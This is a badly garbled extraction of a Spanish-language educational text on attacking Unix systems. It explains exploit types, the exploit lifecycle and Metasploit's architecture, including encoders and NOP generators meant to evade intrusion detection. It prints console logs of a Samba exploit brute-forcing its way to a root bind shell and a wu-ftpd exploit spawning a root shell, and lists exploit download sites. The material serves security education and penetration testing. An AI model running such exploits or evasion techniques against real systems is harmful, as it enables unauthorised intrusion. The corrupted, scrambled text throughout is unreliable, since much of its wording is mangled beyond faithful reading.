Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *2. de 22O
Es de destacar que si el /ireIall que est delante del sitio co "ro etido "er ite los !ings ;7CM! Ec$o> desde el is o $acia 7nternet# esta comunicaci-n puede saltearlo ! mu! posi(lemente pasar completamente desaperci(ido# 'a que 7CM! no es un "rotocolo de asiado interesante "ara observar. El sitio 4i6i de ="ing ;$tt"%&&Ii6i.$"ing.org> "osee todo ti"o. En resu en# ="ing tiene el "otencial de la @ a"# ' brindando al usuario un control a'or)a de las caracter)sticas de s "ersonalizado tanto de s C/inoD o s eje "los de
los "aquetes a enviar co o de las res"uestas obtenidas. Ade s tiene otras ca"acidades# co o el anlisis de reglas de /ireIalls e 75,s# ' la trans/erencia de arc$ivos en /or a CocultaD# sin contar lo que "osibilita su :a desventajas otor de scri"ting. s a"reciables "ueden llegar a ser su /alta de actualizaci8n
;la Glti a versi8n data del 2..5> ' la de una co unidad C/uerteD contribu'endo al desarrollo de scri"ts# /inger"rints# etc.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *2* de 22O
de lograrlo ' de ca inos sin salida en el "roceso# donde de nada si no se tiene 9ito en esta eta"a.
realizado las tareas "revias sin inconvenientes ' con buenos resultados# no sirven !or todo esto es i "osible enu erar o siquiera clasi/icar todos los ti"os de ataques e9istentes $o' en d)a. ,in e bargo# un so ero ;' sie "re corto> listado de las vulnera(ilidades clsicas ' incluir)a a ;S47R7UL2:@T>% Liolaciones de acceso de e oria# co o el Bu//er ?ver/loI s i "ortantes en el so/tIare de $o' en d)a
Errores de /or ateo de strings 7n'ecci8n del ,V: 7n'ecci8n de c8digo A,, ;Cross ,ite ,cri"ting> en A"licaciones 4eb Acceso de 5irectorios ;(irector1 -raversal>
Condiciones de CCarreraD ;:ace &onditions> Escalado de !rivilegios !or otra "arte# los exploits "ueden clasi/icarse en ;S47R7UEA!:T>%
<e otos :ocales Ejecutar c8digo arbitrario Acceder a datos sin "er iso Causar un 5o, ;5enegaci8n de ,ervicio*51>
,egGn su e/ecto
,egGn el Fi"o de Lulnerabilidad que a"rovec$an Ade s# e9iste un circuito que nor al ente recorre cada vulnerabilidad
estas instancias o CCiclo de LidaD de un e9"loit# son% 7. Descu(rimiento% AlgGn investigador o el +. Aviso% :o is o /abricante de so/tIare is o al /abricante. En is a que lo
descubre una vulnerabilidad en un so/tIare ' versi8n deter inada. s co Gn es que luego se avise del algunos casos# si ste no reconoce el /allo o a la "ersona ;co o Bugtraq# "or eje "lo>. 5e cualquier vulnerado# cosa que ocurre en "aralelo. ;. Anlisis% ,e analiza el /allo "ublicado "ara deter inar el alcance del is o# qu co "onente es a/ectado# en qu versiones del so/tIare ocurre# etc. <. Desarrollo del Fxploit% Co ienza el "roceso de desarrollar un e9"loit que $aga uso del /allo. Esto general ente requiere e9tensos conoci ientos de "rogra aci8n en bajo nivel# arquitectura de la quina# ,iste a ?"erativo# etc. Es "or esto que se la considera co o C agia negraD. . Testin)% Aqu) se co "rueba que el e9"loit /uncione en todos los casos donde deber)a $acerloH recordar que un /allo "uede involucrar di/erentes versiones# "lata/or as# etc. de un is o so/tIare. #. Release% El e9"loit se "ublica# general ente en /or a de c8digo /uente# ' odi/icado leve ente# a "ro"8sito# "ara que no /uncione en /or a directa. El objetivo es i "edir que alguien sin conoci ientos *55 lo utilice en /or a indiscri inada. 5ado lo abarcativa que es esta ateria# en este ca")tulo s8lo se introducir a
descubri8# la "ersona que lo descubre lo da a conocer en una lista "Gblica anera# el /abricante debe trabajar en una correcci8n o C"arc$eD "ara que su so/tIare no sea
la utilizaci8n de una $erra ienta que acude en a'uda de quienes desarrollan e9"loits# realizan tests de "enetraci8n# investigadores de seguridad# estudiantes universitarios# ad inistradores de red# ' "or qu no# usuarios con /ines non' sanctos. :uego se ostrarn unos eje "los de ejecuci8n de e9"loits# ' "or Glti o se dejar un listado de enlaces a 7nternet "ara "ro/undizar el te a.
*55 Estos usuarios que s8lo utilizan e9"loits sin conocer c8 o /uncionan se los lla a C,cri"t RiddiesD en la jerga. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *2- de 22O
agregando al "ro'ecto# con lo que /ue evidente que el C"aquete de /uncionesD original necesitaba ser re"ensado "ara "oder satis/acer las de andas de los usuarios. As) /ue co o en el 2..J la versi8n -.. del M,F /ue lanzado# total ente reescrito en un lenguaje co o Ru(!*5O# que le a"orta gran dina is o# e9celente legibilidad# s8lida orientaci8n a objetos ' la "osibilidad de ejecutarse en todas las "lata/or as donde ste lenguaje est so"ortado ;la a'or)a>.
*5J 2<: del "ro'ecto% $tt"%&&III. etas"loit.org *5+ !erl es un lenguaje de scri"ts "er/or ance es u' e9tendido# "rinci"al ente utilizado en ad inistraci8n de ejor# aunque su siste as 2ni9 ' "rogra aci8n Ieb. ,in e bargo# su legibilidad no es la activa ente# est "erdiendo su do inio en
u' buena "ara ser inter"retado. ,i bien sigue siendo desarrollado anos de !=! ;"rinci"al ente en la "arte Ieb>#
!'t$on ' <ub'. ,u 2<: es% $tt"%&&III."erl.org& *5O <ub' es un lenguaje de scri"ting que si bien tiene bastante tie "o desarrollndose ;/ue creado en *005># en estos Glti os aBos incre ent8 su "o"ularidad enor e ente gracias a un /ra eIor6 de desarrollo Ieb lla ado C<ub' on <ailsD. Fiene co o "rinci"ales caracter)sticas ser a igable# "oseer una orientaci8n a objetos u' /uerte ' uc$a /le9ibilidad ;"or ej.# relativa baja e9celentes ca"acidades de intros"ecci8n>. ,u "rinci"al desventaja es su corrigiendo. 2<:% $tt"%&&III.rub'(lang.org Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *21 de 22O
"er/or ance en tie "o de ejecuci8n# aunque es un "roble a que con el tie "o se ir
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *25 de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *2J de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *2+ de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *2O de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *20 de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *-. de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *-* de 22O
Es decir# que Metas"loit bsica ente dis"one de una Base de 5atos de E9"loits ' de !a'loads# donde el usuario "ara iniciar un ataque debe co binarlos# de acuerdo a las caracter)sticas del objetivo ' seleccionando ciertas o"ciones que "er itirn "ersonalizar el ataqueH tanto "ara tener 9ito ;?"ciones Avanzadas> co o "ara evitar la detecci8n ;"or "arte de los 75,s&7!,s segura ente>. En esta ilustraci8n se "ueden a"reciar relacionados los dos conce"tos i "ortantes dentro de la e9"lotaci8n del vulnerabilidades% Fxploit% C8digo que $ace C/allarD un so/tIare en /or a local o re ota a /avor del intruso# "ara /acilitar la ejecuci8n de un c8digo en el objetivo. A a'o de 2..O# la versi8n -.* de Metas"loit "osee 2J0 e9"loits dis"onibles# s all de los que segura ente se "ueden "rogra ar a"rovec$ando las /acilidades del /ra eIor6.
4a!load% Lendr)a a cu "lir la /unci8n del c8digo a ejecutar en el objetivo# en caso de que el E9"loit enviado tenga 9ito. :a gran ventaja que "osee Metas"loit es que al estar se"arado ' abstra)do del e9"loit# es "osible co binar di/erentes e9"loits con di/erentes "a'loads# ' obtener resultados segGn lo que se desee% correr una consola re ota# ejecutar un co ando#
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *-2 de 22O
etc. :o interesante de este diagra a de /unciona iento es que sirve en /or a genrica# ' "uede a"licarse a cualquier $erra ienta si ilar# 'a que representa la manera )eneralmente aceptada de atacar el pro(lema de c-mo 9acer un exploit ! c-mo =uncionan. !or eje "lo# en la Consola -* "uede verse el c8digo /uente de un e9"loit inclu)do en el M,F que a"rovec$a una vulnerabilidad en !=!. Bsica ente se divide en dos "artes% una de inicializaci8n ;la /unci8n CinitializeD># que "er ite integrarse al /ra eIor6# ejecutando una serie de de/inicionesH consta de unas "ocas l)neas. ,in e bargo# "ara reducir al )ni o la cantidad de l)neas de esta anera# =ue imprescindi(le utili3ar al)unas clases ! =unciones disponi(les en el 2rame@or:# "or eje "lo de los "aquetes E9"loit%%<e ote ' <e9%%Fe9t. En ca bio# si el exploit 9u(iera tenido que escri(irse por separado% aislado del 1A2% en un len)uaje como /% se)uramente ser6a muc9o ms lar)o% di=6cil de estudiar ! de modi=icar% adems de pro)ramar. ientras que el e9"loit en s) se ejecuta en la /unci8n C"$"Ue9"loitD# que co o se "uede ver# s8lo
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *-- de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *-1 de 22O
7. Rex ;<ub' E9tension :ibrar'>% <e9 es el co "onente todo el Fra eIor6# ' su Gnica de"endencia es <ub' '
s i "ortante de is o s los
8dulos inclu)dos con el lenguaje. Bsica ente es una colecci8n de clases 8dulos que "ueden ser utilizados "or "rogra adores "ara construir 8dulos alrededor del M,F. :os 8dulos s relevantes anejando anera $erra ientas o
que lo co "onen*50 son% aE Assem(l!% Es Gtil "ara realizar o"eraciones a bajo nivel# los registros del "rocesador# "ila# etc.# ' en di/erentes arquitecturas ;little(endian&big(endian# !oIer!C# ,"arc# 9OJ# etc.>. Es una si "le e integrada al entorno de acceder a todos los ?"codes *J. de una
*50 !ara ver el c8digo /uente de <e9 ' sus *J. Ler Plosario% ?"code# "g. 2**. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *-5 de 22O 8dulos# s8lo $a' que dirigirse al directorio `&lib&re9&hno breU 8duloe en una instalaci8n estndar de M,F.
"lata/or a. (E Fncodin)% ,irve "ara o/uscar*J* el contenido de un "a'load. Es i "ortante utilizarlo en caso de tener la certeza de que $a' un 75, veri/icando el tr/ico que se env)a al objetivo. cE Po(s ;Frabajos>% En ocasiones es necesario dividir una tarea en varios trabajos. :os Jobs o trabajos se de/inen co o )te s de trabajo /initos que tienen una tarea es"ec)/ica. 5e esta dE Lo))in)% Es un servicio de eE 4ost.exploitation% Este anera# la idea es /acilitar la coordinaci8n de estos trabajos con /unciones es"ec)/icas "ara ello. ensajes de estado ;:ogs> dentro del Fra eIor6# clasi/icado "or niveles ;de . a ->. 8dulo "rovee servicios 'a incor"orados "ara se dis"onen una gran variedad de utilizar re ota ente el objetivo una vez que el e9"loit tuvo 9ito. !or eje "lo# la clase ,tda"i*J2 /unciones% acceso a arc$ivos# red# siste a ' otras "ro"iedades de la quina re ota que son casi universales. =E 4rotocols% 5a so"orte a "rotocolos estndar co o =FF!# ,MB# 5CE<!C ' ,2@<!C. )E Aervices% !er ite que uno o varios e9"loits se registren co o C,ervicioD ' escuc$en ;en "odr)an ser resultados> al ,ervidores FC!&25!# odo "ro iscuo> "or tr/ico ;' que bien is o tie "o.
9E Aoc:ets% !rovee acceso a la A!7 de ,oc6ets de <ed ;Clientes ' anejo de ,,:# etc.>. iE A!nc9roni3ation% 5ado que M,F $ace uso del Multi(F$reading# aqu) se "roveen rutinas que "er iten a"rovec$arlo. +. 2rame@or: /ore% 7 "le enta un conjunto de clases que /uncionan de inter/az a los 8dulos ' "lugins del /ra eIor6H es decir# si se desea $acer 8dulo "ara M,F# es necesario trabajar con este un "lugin o un
co "onente. Frabaja con un en/oque basado en instancias del /ra eIor6. aE DataAtore% ActGa co o un re"ositorio de datos del entorno de la instancia. (E Fvent Noti=ications% !er ite que los desarrolladores de
*J* Ler Plosario% ?/uscaci8n# "g. 2**. *J2 :a clase ,tda"i se encuentra en el arc$ivo ubicado en &/ra eIor6( -.*&lib&re9&"ost& eter"reter&e9tensions&stda"i&stda"i.rb. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *-J de 22O
8dulos '
"lugins reaccionen a di/erentes eventos del /ra eIor6# a travs de un t)"ico "roceso de registro de /ra eIor6# co o ;. 2rame@or: &ase% Este anejadores ; andlers>. cE 2rame@or: 1ana)ers% !er ite ad inistrar co "onentes cr)ticos del 8dulos# "lugins# sesiones ' trabajos. 8dulo est construido enci a del Core# ' "rovee
todos "ara /acilitar la interacci8n con l. aE /on=i)uration% Mantiene una con/iguraci8n "ersistente# ade s de /unciones "ara conocer la estructura de la instalaci8n ;"or eje "lo# el directorio ra)z de la is a>. 8dulos (E Lo))in)% !rovee so"orte de logging "ara el nGcleo ' "revia ente. cE Aessions% !er ite acceder a las sesiones re otas establecidas "or el usuario ;Co and,$ell o Meter"reter>. <. 2rame@or: User Inter=aces% Ler a"artado +.*.-. . 2rame@or: 1odules% El "ro"8sito "rinci"al del Fra eIor6 es /acilitar el desarrollo de Fra eIor6 ' el 8dulos que "uedan conectarse al is o ' co "artirse. Esto sucede# "or eje "lo# cuando se agrega un nuevo !a'load al is o estar dis"onible "ara ser utilizado en cualquier 8dulos descienden E9"loit# 'a que toda la arquitectura tiene bien de/inida sus inter/aces# clases ' relaciones. !ara dar otro eje "lo# todos los de la clase base Ms/%%Module# ' as) sucesiva ente. aE Fncoder% Estos 8dulos sirven "ara generar versiones trans/or adas de los "a'loads en crudo# "ara que "ri ero viajen "or la red# eviten ser detectados "or 75,s ' luego s)# ser decodi/icados en el objetivo "ara su "osterior ejecuci8n. 2n algorit o co Gn que se utiliza es el A?< binario# "or lo r"ido ' sencillo. Est basado en <e9%%Encoding. (E Fxploit% Es el /oco "rinci"al del Fra eIor6. ,on utilizados "ara /orzar vulnerabilidades de cE N04 Menerators% Estos anera que "er ita al M,F ejecutar c8digo 8dulos se da en la clase Ms/%%E9"loit. 8dulos son utilizados "ara crear una cadena arbitrario. El so"orte "ara estos
de instrucciones asse bler ;lla ados @?!s> que no "rovoquen ningGn e/ecto cuando se ejecuten# s8lo alterar el estado de los registros o odi/icar banderas ;flags> del "rocesador. ,on bastante utilizados en
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *-+ de 22O
los e9"loits. El "roble a con los @?!s triviales es que son /cil ente identi/icables en un "a'load "or un 75,. Con este generador# es sencillo crear @?!s que /uncionen igual# "ero de longitud variable ' "seudoaleatorios. dE 4a!load% !roveen c8digo al Fra eIor6 que "uede ser ejecutado luego de que un e9"loit tenga 9ito al controlar el /lujo de ejecuci8n. M,F dis"one de unas cuantas o"ciones# ' "ara crear uno nuevo $ace /alta crear una clase que $erede de Ms/%%!a'load. 5e esta est dis"onible "revia ente. eE Auxiliar! 1odules% ,e trata de utilidades incluidas en el M,F que no tienen que ver directa ente con e9"lotar un objetivo# sino con actividades relacionadas% ejecutar un !ort ,can# "rovocar un 5o,*Jconocido en un so/tIare# loguearse en una Base de 5atos# interactuar con algGn ,ervicio# detectar la versi8n de un servidor# etc. #. 2rame@or: 4lu)ins% !ara di/erenciarlo de los los "lugins co o "iezas diseBadas "ara cualquier cosa con l. M,F dis"one de servicio en un soc6et# etc. 5e esta contenido de una tabla. 8dulos# "uede "ensarse a is o. El odi/icar el Fra eIor6 anera "ueden agregarse acciones "ersonalizadas# o so"ortar otra arquitectura que no
objetivo "uede ser cualquiera# 'a que en "ri era instancia se "er ite $acer 8dulos "ara cone9i8n a Bases de 5atos ;!ostgre,V:# M',V: ' ,V:ite># otro que ejecuta M,F co o un anera# el "lugin "ara cone9i8n a bases de datos "er ite# "or eje "lo# atacar un conjunto de $osts de acuerdo al
de un scri"t e9terno# 'a que ace"ta los "ar etros de entrada# ejecuta lo que se le ordena "or la l)nea de co andos ' sale. Ler Consola @ro. -2. 2. /onsola Interactiva Dms=consoleE% Es la /or a s r"ida de usar Metas"loit. Bsica ente se ejecuta el /ra eIor6# ' se obtiene una l)nea de co andos donde se selecciona el&los e9"loits a ejecutar# el "a'load# las
*J- Ler Plosario% 5o,% 5enegaci8n de ,ervicio# "g. 2*.. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *-O de 22O
o"ciones ' se lanza el ataque. En la Consola @ro. --.se "uede observar la salida del co ando Cin/oD sobre un e9"loit# "ara ver el alcance ' caracter)sticas del is o antes de utilizarlo o no.
marcelo@saturno:~/src/6rame>or=& .1$ ./ms6cli K age: .;m f!"i TeDp"oitAname> Toption1@a"ue> -mo7e0 1111111111111111111111111111111111111111111111111111 3o7e ---9?:e"p 9.:ummarE 9O:ption 9#:7@an!e7 98:D. <@a ion 9P:aE"oa7 9T:arget 9#,:tion 9,:'e!6 9<:De!ute <Dp"oit 11111111 Name ---eDp"oit;b 7i; oft!art;mer!ante!A oft!art O@erf"o> eDp"oit;freeb 7;ta!a! ;Dta!a! 7Areport Cuffer O@erf"o> eDp"oit;'puD;"p7;!"eanupAeDe! ?...@ #uDi"iarE 111111111 Name ---auDi"iarE;a7min;ba!6upeDe!;7ump $emote Bi"e #!!e auDi"iarE;a7min;ba!6upeDe!;regi trE $egi trE #!!e auDi"iarE;a7min;!i !o;io A'ttpAaut'AbEpa #7mini trati@e #!!e ?...@ De !ription ----------=erita Ca!6up <De! &in7o> =erita Ca!6up <De! .er@er De !ription ----------3er!ante! .oft,art ,H8 GT#,#,.D T1 +.1.( report9: ?P-KG 2PD ,omman7 <De!ution De !ription ----------/ouJre "oo6ing at it babE` .'o> information about t'i mo7u"e .'o> a@ai"ab"e option for t'i mo7u"e .'o> a@ai"ab"e a7@an!e7 option for t'i mo7u"e .'o> a@ai"ab"e i7 e@a ion option for t'i mo7u"e .'o> a@ai"ab"e paE"oa7 for t'i mo7u"e .'o> a@ai"ab"e target for t'i eDp"oit mo7u"e .'o> a@ai"ab"e a!tion for t'i auDi"iarE mo7u"e $un t'e !'e!6 routine of t'e e"e!te7 mo7u"e <De!ute t'e e"e!te7 mo7u"e
Consola -2% Ejecuci8n de Metas"loit sin "ar etros en su versi8n de :)nea de Co andos
-. Inter=a3 Mr=ica de Usuario Dms=)uiE % !ara quienes dis"onen de o "re/ieren la inter/az gr/ica# ejecutar varios trabajos a la vez# etc.# Metas"loit dis"one de una versi8n gr/ica ulti"lata/or a ;7lustraci8n **>. Es bastante atractiva# r"ida e intuitiva co o "ara considerarla "or sobre la versi8n de consolaH ade s "osee la ca"acidad de ejecutar varias CconsolasD de M,F al is o tie "o ' desde la P27 is a. 1. Aplicaci-n He( Dms=@e(E% ,u ndose a la C odaD actual de las
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *-0 de 22O
anera de correr Metas"loit en /or a re ota o local# s8lo a"untando un navegador a su ,ervidor 4eb ' A"licaci8n e bebidos ;7lustraci8n **>.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *1. de 22O
in6o e,ploit/linu,/ids/snortbopre .nort Ca!6 Orifi!e Pre-Prepro!e 5365 No C.D 2i!en e or $emote <Dp"oit
Pro@i7e7 bE: 5ai_ern 2au TD>ing ImE e!.org> #@ai"ab"e target : 87 Name -- ---0 Debian 3.1 .arge Ca i! option : Name ,urrent .etting -----------------$?O.T $PO$T 90)0 PaE"oa7 information: .pa!e: 1073 #@oi7: 1 !'ara!ter De !ription: T'i mo7u"e eDp"oit a ta!6 o@erf"o> in t'e Ca!6 Orifi!e pre-pro!e or mo7u"e in!"u7e7 >it' .nort @er ion (.+.04 (.+.14 (.+.(4 an7 (.+.3. T'i @u"nerabi"itE !ou"7 be u e7 to !omp"ete"E !ompromi e a .nort en or4 an7 >ou"7 tEpi!a""E gain an atta!6er fu"" root or a7mini trati@e pri@i"ege . $eferen!e : 'ttp:;;>>>. e!uritEfo!u .!om;bi7;15131 'ttp:;;!@e.mitre.org;!gi-bin;!@ename.!gi*name1(005-3(5( 'ttp:;;Dfor!e.i .net;Dfor!e;a"ert ;i7;(07 ms6 ' sIo> e,ploits $equire7 -------Ee Ee De !ription ----------T'e target a77re T'e target port
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *1* de 22O
Target: Target Not .pe!ifie7 ms6 sambaNnttrans ' set /K4-2 192.168.0.200 $?O.T -> 19(.16).0.(00 ms6 sambaNnttrans ' sIo> targets .upporte7 <Dp"oit Target 1111111111111111111111111
*J1 ,a ba es un so/tIare "ara 2ni9 que i "le enta el "rotocolo ,MB&C7F,# que es el que utiliza 4indoIs "ara co "artir arc$ivos e i "resoras en una <ed. Ade s# "er ite integrar estaciones de trabajo 2ni9 a redes 4indoIs. 2<:% $tt"%&&III.sa ba.org Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *12 de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *1- de 22O
0 1 ( 3 + 5 6 7
,omp"ete Crute Bor!e (.0 Crute Bor!e (.( Crute Bor!e (.0.6 ; $e7 ?at 6.( (.0.7 ; $e7 ?at 7.0 (.(.1 ; $e7 ?at 7.( (.(.5 ; $e7 ?at ).0 (.(.+ ; ."a!6>are ).1
ms6 sambaNnttrans ' set 2%/BC2 2 T#$H<T -> ( ms6 sambaNnttrans ' sIo> *%874%)3eta p"oit Brame>or6 K ab"e PaE"oa7 111111111111111111111111111111111111 "inuDAia3(Aa77u er "inuDAia3(Abin7 "inuDAia3(Abin7A tg "inuDAia3(AeDe! "inuDAia3(Afin7re!@ "inuDAia3(Afin7re!@A tg "inuDAia3(Afin7 o!6 "inuDAia3(Are@er e "inuDAia3(Are@er eAimpuritE Kp"oa7;<De!ute "inuDAia3(Are@er eA tg "inuDAia3(Are@er eAu7p 2inuD 2inuD 2inuD 2inuD 2inuD 2inuD 2inuD 2inuD 2inuD 8#3( 8#3( 8#3( 8#3( 8#3( 8#3( 8#3( 8#3( 8#3( #77 K er Cin7 .'e"" .tage7 Cin7 .'e"" <De!ute ,omman7 $e!@ Tag Bin7 o!6 .'e"" .tage7 Bin7 o!6 .'e"" .r!Port Bin7 o!6 .'e"" $e@er e .'e"" $e@er e 8mpuritE
2inuD 8#3( .tage7 $e@er e .'e"" 2inuD 8#3( $e@er e KDP .'e""
ms6 sambaNnttrans ' set *%874%) linu,Nia 2Nbind P#/2O#D -> "inuDAia3(Abin7 m f ambaAnttran 9"inuDAia3(Abin7: > eDp"oit -Q0 .tarting Cin7 ?an7"er. -Q0 .tarting atta!6 again t target .amba (.( Crute Bor!e -Q0 #tta!6 >i"" u e (5 t'rea7 >it' )19 tota" attempt -Q0 -Q0 -Q0 -Q0 -Q0 < tab"i 'ing (5 !onne!tion9 : to t'e target... --- .etting up t'e .3C e ion... --- < tab"i 'ing tree !onne!tion... --- .en7ing fir t nttran !omponent... --- ,omp"ete7 range 0D0)300000:0D0)(f63!0
-Q0 Crute for!e 'ou"7 !omp"ete in approDimate"E 16.0 minute -Q0 < tab"i 'ing (5 !onne!tion9 : to t'e target... -Q0 --- .etting up t'e .3C e ion... -Q0 --- < tab"i 'ing tree !onne!tion... -Q0 --- .en7ing fir t nttran !omponent... -Q0 --- ,omp"ete7 range 0D0)(f63!0:0D0)(e!7)0 ?...@ -Q0 Crute for!e 'ou"7 !omp"ete in approDimate"E 7.( minute -Q0 < tab"i 'ing (5 !onne!tion9 : to t'e target... -Q0 --- .etting up t'e .3C e ion... -Q0 --- < tab"i 'ing tree !onne!tion... -Q0 --- .en7ing fir t nttran !omponent... -Q0 --- ,omp"ete7 range 0D0)(+67+0:0D0)(3!b00 ?U@ Bot connection 6rom 192.168.0.2:1121 M&' 192.168.0.200:.... id ui7109root: gi7109root: group 1999nobo7E: uname &a 2inuD "o!a"'o t."o!a"7omain (.+.(0-6 N1 T'u Beb (7 10:01:19 <.T (003
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *11 de 22O
!ara el ataque se utiliz8 Metas"loit versi8n 2.+# la Glti a de la serie 2.9# 'a que si bien Metas"loit -.* conten)a este e9"loit en su base de datos# el ataque no /ue e9itoso en las "ruebas. Cabe aclarar que Meta"s"loit -.* tiene algunos igrar los que /alten o a "liar e9"loits que no estn del todo co "letos ;co o ste> con res"ecto a la versi8n anterior# ' el equi"o de desarrollo aGn trabaja en los que estn en cuanto a caracter)sticas. ,e "uede ver que el e9"loit en M,F v2.+ se lla a Csa baUnttransD# ' corres"onde a un ataque de Bu//er ?ver/loI detallado en el CLE(2..-(..O5 *J5 '
*J5 2<: del <e"orte% $tt"%&&cve. itre.org&cgi(bin&cvena e.cgiYna ea2..-(..O5 Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *15 de 22O
Bugtraq 75 +*.J*JJ# "ublicado el *5 de Marzo de 2..-. :a utilizaci8n de M,F v2.+ es idntica a la de la serie -.9% ,e selecciona el e9"loit ;Cuse sa baUnttransD> ,e ven las o"ciones requeridas "or el is o ;Cs$oI o"tionsD> ,e establecen las o"ciones a utilizar ;Cset <=?,FD# Cset FA<PEFD> ,e establece el "a'load ;Cset !AK:?A5 linu9Uia-2UbindD>% Este "a'load genera un ini(servidor con un s$ell en el "uerto 1111 del objetivo# con odo los "er isos del usuario que ejecuta el "roceso e9"lotado ;,a ba se ejecuta nor al ente co o usuario root>. Es si ilar a un netcat en :7,FE@# co o se describi8 en la Consola 2*# "g. 0*.
,e ejecutan algunos co andos# "ara ver qu "er isos se tienen# a qu ,? corres"onde# ' se uestran los arc$ivos de usuarios ' de "assIords.
trata de un viejo servidor <ed =at :inu9 versi8n J.2# ' su servidor FF!
*JJ Ler 2<:% $tt"%&&III.securit'/ocus.co &bid&+*.J *J+ ,itio o/icial del so/tIare% $tt"%&&III.Iu(/t"d.org& Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *1J de 22O
0D0)07f77): in (3) bEte 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 f7 0! 0! 0! 0! 0! 0! 0! 0! 0! 0! 90 01 f7 ff 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 07 eb eb eb eb eb eb eb eb eb eb 90 01 e3 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0) 0! 0! 0! 0! 0! 0! 0! 0! 0! 0! 90 50 fe F F F F F F F F F F F F F F F F F F F F F F F F F F F F F F F 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 ............D... ................ ................ ................ ................ ................ ................ ................ ................ ................ ................ ................ ..1.,..tR.-....P ..Y.G......1.... ./Y.G.........
pa7!'un6A iOe 1 0D0000001) 11> 15 N 3. triggering free9g"ob"i t-10: N N eDp"oitation u!!ee7e7. en7ing rea" 'e""!o7e N en7ing etreui7;!'root;eDe!@e 'e""!o7e N pa>ning 'e"" NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNN ui7109root: gi7109root: egi71509ftp: group 1509ftp: 2inuD r'6( (.(.1+-5.0 N1 Tue 3ar 7 (1:07:39 <.T (000 i*)6 un6no>n
p>d ;'ome;ftp ls cd / p>d ; ls bin "o tPfoun7 boot mnt 7e@ opt et! pro! 'ome root "ib bin tmp u r @ar Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *1+ de 22O uname &a 2inuD r'6( (.(.1+-5.0 N1 Tue 3ar 7 (1:07:39 <.T (000 i*)6 un6no>n id ui7109root: gi7109root: egi71509ftp: group 1509ftp:
:a vulnerabilidad a"rovec$ada se encuentra detallada en el CE<F Advisor' ;CA(2..*(--*JO ' CLE(2..*(.55.*J0># ' se "uede clasi/icar co o un error en el anejo de los strings enviados "or el usuario.
i "ortantes al res"ecto incluir)a a los siguientes% 1ilH$rm% ,itio que tiene en su "gina "rinci"al un listado de los Glti os e9"loits "ublicados# ade s de una base de e9"loits se encuentra en constante actualizaci8n. !gina !rinci"al% $tt"%&& ilI.r .co & Colecci8n de e9"loits% $tt"%&& ilI.r .co &s"loits& ilI.r .tar.bz2
&ac:Trac:% Es una distribuci8n de :inu9 es"ecial ente creada "ara !enetration Festing. $tt"%&&III.re ote(e9"loit.org&bac6trac6.$t l Damn Bulnera(le Linux% Esta es una distribuci8n de :inu9 en /or ato de :ive(C5# que es total ente insegura a "ro"8sito# ' que ade s inclu'e uc$os e9"loits# cursos ' $erra ientas "ara e9"lotarse a s) $tt"%&&III.da nvulnerablelinu9.org& is o.
4ac:et Atorm Aecurit!% ,itio con in/or aci8n ' $erra ientas de de/ensa "or un lado ' e9"loits "or el otro. $tt"%&&"ac6etstor securit'.org& Learn Aecurit! 0nline% 7nclu'e cursos# in/or aci8n ' varios
T9e Ft9ical 8ac:er Net@or:% Co unidad# noticias ' recursos sobre =ac6ing Etico. $tt"%&&III.et$ical$ac6er.net& /rac:mes.de% ,itio que contiene una Base de Crac6Mes entre otros. $tt"%&&III.crac6 es.de& s que
*JO 2<: del aviso% $tt"%&&III.cert.org&advisories&CA(2..*(--.$t l *J0 2<:% $tt"%&&cve. itre.org&cgi(bin&cvena e.cgiYna eaCA@(2..*(.55. *+. 2n CCrac6MeD es un C"roble a de crac6ingD# general ente en /or a de arc$ivo binario# "ara ro "er ' e9"lotar su C"rotecci8nD. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *1O de 22O
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *10 de 22O
